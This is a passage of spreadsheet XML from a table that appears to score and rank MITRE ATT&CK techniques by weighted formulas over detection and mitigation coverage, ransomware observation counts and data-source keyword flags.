      <c r="AM11" s="37" t="str" cm="1">
        <f t="array" ref="AM11">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD11)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN11" s="37">
        <v>0</v>
      </c>
      <c r="AO11" s="37">
        <v>0</v>
      </c>
      <c r="AP11" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ11" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.2936498730158732</v>
      </c>
      <c r="AR11" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS11" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT11" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU1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2" spans="1:47" ht="34">
      <c r="A12" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B12" s="37">
        <f t="shared" si="0"/>
        <v>13.199992142857145</v>
      </c>
      <c r="C12" s="37" t="s">
        <v>102</v>
      </c>
      <c r="D12" s="50" t="s">
        <v>83</v>
      </c>
      <c r="E12" s="37" t="s">
        <v>103</v>
      </c>
      <c r="F12" s="37">
        <v>1</v>
      </c>
      <c r="G12" s="37">
        <v>1</v>
      </c>
      <c r="H12" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I12" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J12" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K12" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L12" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M12" s="37">
        <v>0</v>
      </c>
      <c r="N12" s="56">
        <v>0</v>
      </c>
      <c r="O12" s="56">
        <v>12</v>
      </c>
      <c r="P12" s="56">
        <v>1</v>
      </c>
      <c r="Q12" s="56">
        <v>0</v>
      </c>
      <c r="R12" s="57" t="s">
        <v>104</v>
      </c>
      <c r="S12" s="57">
        <v>11</v>
      </c>
      <c r="T12" s="57" t="s">
        <v>105</v>
      </c>
      <c r="U12" s="57">
        <v>14</v>
      </c>
      <c r="V12" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.29999976190476191</v>
      </c>
      <c r="W12" s="37">
        <v>25</v>
      </c>
      <c r="X12" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y12" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z12" s="37">
        <v>13</v>
      </c>
      <c r="AA12" s="37">
        <v>0.13</v>
      </c>
      <c r="AB12" s="37">
        <v>0.13</v>
      </c>
      <c r="AC12" s="37"/>
      <c r="AD12" s="50" t="s">
        <v>106</v>
      </c>
      <c r="AE12" s="37" t="str" cm="1">
        <f t="array" ref="AE12">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD12)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF12" s="37">
        <v>8</v>
      </c>
      <c r="AG12" s="37" t="str" cm="1">
        <f t="array" ref="AG12">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD12)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH12" s="37">
        <v>8</v>
      </c>
      <c r="AI12" s="37" t="str" cm="1">
        <f t="array" ref="AI12">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD12)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ12" s="37">
        <v>8</v>
      </c>
      <c r="AK12" s="37" t="str" cm="1">
        <f t="array" ref="AK12">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD12)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL12" s="37">
        <v>8</v>
      </c>
      <c r="AM12" s="37" t="str" cm="1">
        <f t="array" ref="AM12">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD12)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN12" s="37">
        <v>0</v>
      </c>
      <c r="AO12" s="37">
        <v>2</v>
      </c>
      <c r="AP12" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ12" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.3999973809523816</v>
      </c>
      <c r="AR12" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS12" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT12" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU1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0.25714273242630387</v>
      </c>
    </row>
    <row r="13" spans="1:47" ht="17">
      <c r="A13" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B13" s="37">
        <f t="shared" si="0"/>
        <v>16.209516761904766</v>
      </c>
      <c r="C13" s="37" t="s">
        <v>107</v>
      </c>
      <c r="D13" s="50" t="s">
        <v>83</v>
      </c>
      <c r="E13" s="37" t="s">
        <v>108</v>
      </c>
      <c r="F13" s="37">
        <v>1</v>
      </c>
      <c r="G13" s="37">
        <v>1</v>
      </c>
      <c r="H13" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I13" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J13" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K13" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L13" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M13" s="37">
        <v>0</v>
      </c>
      <c r="N13" s="56">
        <v>0</v>
      </c>
      <c r="O13" s="56">
        <v>8</v>
      </c>
      <c r="P13" s="56">
        <v>0</v>
      </c>
      <c r="Q13" s="56">
        <v>1</v>
      </c>
      <c r="R13" s="57" t="s">
        <v>109</v>
      </c>
      <c r="S13" s="57">
        <v>14</v>
      </c>
      <c r="T13" s="57" t="s">
        <v>110</v>
      </c>
      <c r="U13" s="57">
        <v>17</v>
      </c>
      <c r="V13" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.33809504761904768</v>
      </c>
      <c r="W13" s="37">
        <v>31</v>
      </c>
      <c r="X13" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Y13" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Z13" s="37">
        <v>9</v>
      </c>
      <c r="AA13" s="37">
        <v>0.09</v>
      </c>
      <c r="AB13" s="37">
        <v>0.09</v>
      </c>
      <c r="AC13" s="37"/>
      <c r="AD13" s="50" t="s">
        <v>111</v>
      </c>
      <c r="AE13" s="37" t="str" cm="1">
        <f t="array" ref="AE13">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD13)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF13" s="37">
        <v>9</v>
      </c>
      <c r="AG13" s="37" t="str" cm="1">
        <f t="array" ref="AG13">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD13)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH13" s="37">
        <v>9</v>
      </c>
      <c r="AI13" s="37" t="str" cm="1">
        <f t="array" ref="AI13">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD13)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ13" s="37">
        <v>9</v>
      </c>
      <c r="AK13" s="37" t="str" cm="1">
        <f t="array" ref="AK13">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD13)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL13" s="37">
        <v>9</v>
      </c>
      <c r="AM13" s="37" t="str" cm="1">
        <f t="array" ref="AM13">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD13)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN13" s="37">
        <v>0</v>
      </c>
      <c r="AO13" s="37">
        <v>1</v>
      </c>
      <c r="AP13" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ13" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.403172253968255</v>
      </c>
      <c r="AR13" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS13" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT13" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU1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0.1524564822373394</v>
      </c>
    </row>
    <row r="14" spans="1:47" ht="51">
      <c r="A14" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B14" s="37">
        <f t="shared" si="0"/>
        <v>15.814279857142859</v>
      </c>
      <c r="C14" s="37" t="s">
        <v>112</v>
      </c>
      <c r="D14" s="50" t="s">
        <v>83</v>
      </c>
      <c r="E14" s="37" t="s">
        <v>113</v>
      </c>
      <c r="F14" s="37">
        <v>1</v>
      </c>
      <c r="G14" s="37">
        <v>1</v>
      </c>
      <c r="H14" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I14" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J14" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K14" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L14" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M14" s="37">
        <v>0</v>
      </c>
      <c r="N14" s="56">
        <v>0</v>
      </c>
      <c r="O14" s="56">
        <v>8</v>
      </c>
      <c r="P14" s="56">
        <v>0</v>
      </c>
      <c r="Q14" s="56">
        <v>0</v>
      </c>
      <c r="R14" s="57" t="s">
        <v>114</v>
      </c>
      <c r="S14" s="57">
        <v>10</v>
      </c>
      <c r="T14" s="57" t="s">
        <v>115</v>
      </c>
      <c r="U14" s="57">
        <v>16</v>
      </c>
      <c r="V14" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.28571414285714286</v>
      </c>
      <c r="W14" s="37">
        <v>26</v>
      </c>
      <c r="X14" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Y14" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Z14" s="37">
        <v>8</v>
      </c>
      <c r="AA14" s="37">
        <v>0.08</v>
      </c>
      <c r="AB14" s="37">
        <v>0.08</v>
      </c>
      <c r="AC14" s="37"/>
      <c r="AD14" s="50" t="s">
        <v>116</v>
      </c>
      <c r="AE14" s="37" t="str" cm="1">
        <f t="array" ref="AE14">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD14)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF14" s="37">
        <v>10</v>
      </c>
      <c r="AG14" s="37" t="str" cm="1">
        <f t="array" ref="AG14">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD14)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH14" s="37">
        <v>10</v>
      </c>
      <c r="AI14" s="37" t="str" cm="1">
        <f t="array" ref="AI14">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD14)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ14" s="37">
        <v>10</v>
      </c>
      <c r="AK14" s="37" t="str" cm="1">
        <f t="array" ref="AK14">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD14)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL14" s="37">
        <v>10</v>
      </c>
      <c r="AM14" s="37" t="str" cm="1">
        <f t="array" ref="AM14">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD14)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN14" s="37">
        <v>0</v>
      </c>
      <c r="AO14" s="37">
        <v>1</v>
      </c>
      <c r="AP14" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ14" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.2714266190476193</v>
      </c>
      <c r="AR14" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS14" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT14" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU1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0.14931968140589569</v>
      </c>
    </row>
    <row r="15" spans="1:47" ht="17">
      <c r="A15" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B15" s="37">
        <f t="shared" si="0"/>
        <v>13.928571428571429</v>
      </c>
      <c r="C15" s="37" t="s">
        <v>117</v>
      </c>
      <c r="D15" s="50" t="s">
        <v>83</v>
      </c>
      <c r="E15" s="37" t="s">
        <v>118</v>
      </c>
      <c r="F15" s="37">
        <v>1</v>
      </c>
      <c r="G15" s="37">
        <v>1</v>
      </c>
      <c r="H15" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I15" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J15" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K15" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L15" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M15" s="37">
        <v>0</v>
      </c>
      <c r="N15" s="56">
        <v>0</v>
      </c>
      <c r="O15" s="56">
        <v>0</v>
      </c>
      <c r="P15" s="56">
        <v>0</v>
      </c>
      <c r="Q15" s="56">
        <v>0</v>
      </c>
      <c r="R15" s="57" t="s">
        <v>119</v>
      </c>
      <c r="S15" s="57">
        <v>8</v>
      </c>
      <c r="T15" s="57" t="s">
        <v>105</v>
      </c>
      <c r="U15" s="57">
        <v>14</v>
      </c>
      <c r="V15" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20952380952380956</v>
      </c>
      <c r="W15" s="37">
        <v>22</v>
      </c>
      <c r="X15" s="37">
        <v>0.4</v>
      </c>
      <c r="Y15" s="37">
        <v>0.4</v>
      </c>
      <c r="Z15" s="37">
        <v>0</v>
      </c>
      <c r="AA15" s="37">
        <v>0</v>
      </c>
      <c r="AB15" s="37">
        <v>0</v>
      </c>
      <c r="AC15" s="37"/>
      <c r="AD15" s="50" t="s">
        <v>101</v>
      </c>
      <c r="AE15" s="37" t="str" cm="1">
        <f t="array" ref="AE15">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD15)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF15" s="37">
        <v>11</v>
      </c>
      <c r="AG15" s="37" t="str" cm="1">
        <f t="array" ref="AG15">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD15)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH15" s="37">
        <v>11</v>
      </c>
      <c r="AI15" s="37" t="str" cm="1">
        <f t="array" ref="AI15">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD15)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ15" s="37">
        <v>11</v>
      </c>
      <c r="AK15" s="37" t="str" cm="1">
        <f t="array" ref="AK15">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD15)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL15" s="37">
        <v>11</v>
      </c>
      <c r="AM15" s="37" t="str" cm="1">
        <f t="array" ref="AM15">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD15)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN15" s="37">
        <v>0</v>
      </c>
      <c r="AO15" s="37">
        <v>0</v>
      </c>
      <c r="AP15" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ15" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.6428571428571432</v>
      </c>
      <c r="AR15" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS15" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT15" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU1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6" spans="1:47" ht="17">
      <c r="A16" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B16" s="37">
        <f t="shared" si="0"/>
        <v>15.633333333333335</v>
      </c>
      <c r="C16" s="37" t="s">
        <v>120</v>
      </c>
      <c r="D16" s="50" t="s">
        <v>83</v>
      </c>
      <c r="E16" s="37" t="s">
        <v>121</v>
      </c>
      <c r="F16" s="37">
        <v>1</v>
      </c>
      <c r="G16" s="37">
        <v>1</v>
      </c>
      <c r="H16" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I16" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J16" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K16" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L16" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M16" s="37">
        <v>0</v>
      </c>
      <c r="N16" s="56">
        <v>0</v>
      </c>
      <c r="O16" s="56">
        <v>0</v>
      </c>
      <c r="P16" s="56">
        <v>1</v>
      </c>
      <c r="Q16" s="56">
        <v>1</v>
      </c>
      <c r="R16" s="57" t="s">
        <v>119</v>
      </c>
      <c r="S16" s="57">
        <v>8</v>
      </c>
      <c r="T16" s="57" t="s">
        <v>105</v>
      </c>
      <c r="U16" s="57">
        <v>14</v>
      </c>
      <c r="V16" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.21904761904761907</v>
      </c>
      <c r="W16" s="37">
        <v>22</v>
      </c>
      <c r="X16" s="37">
        <v>0.4</v>
      </c>
      <c r="Y16" s="37">
        <v>0.4</v>
      </c>
      <c r="Z16" s="37">
        <v>2</v>
      </c>
      <c r="AA16" s="37">
        <v>0.02</v>
      </c>
      <c r="AB16" s="37">
        <v>0.02</v>
      </c>
      <c r="AC16" s="37"/>
      <c r="AD16" s="50" t="s">
        <v>101</v>
      </c>
      <c r="AE16" s="37" t="str" cm="1">
        <f t="array" ref="AE16">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD16)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF16" s="37">
        <v>12</v>
      </c>
      <c r="AG16" s="37" t="str" cm="1">
        <f t="array" ref="AG16">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD16)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH16" s="37">
        <v>12</v>
      </c>
      <c r="AI16" s="37" t="str" cm="1">
        <f t="array" ref="AI16">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD16)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ16" s="37">
        <v>12</v>
      </c>
      <c r="AK16" s="37" t="str" cm="1">
        <f t="array" ref="AK16">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD16)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL16" s="37">
        <v>12</v>
      </c>
      <c r="AM16" s="37" t="str" cm="1">
        <f t="array" ref="AM16">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD16)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN16" s="37">
        <v>0</v>
      </c>
      <c r="AO16" s="37">
        <v>0</v>
      </c>
      <c r="AP16" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ16" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.2111111111111112</v>
      </c>
      <c r="AR16" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS16" s="37">
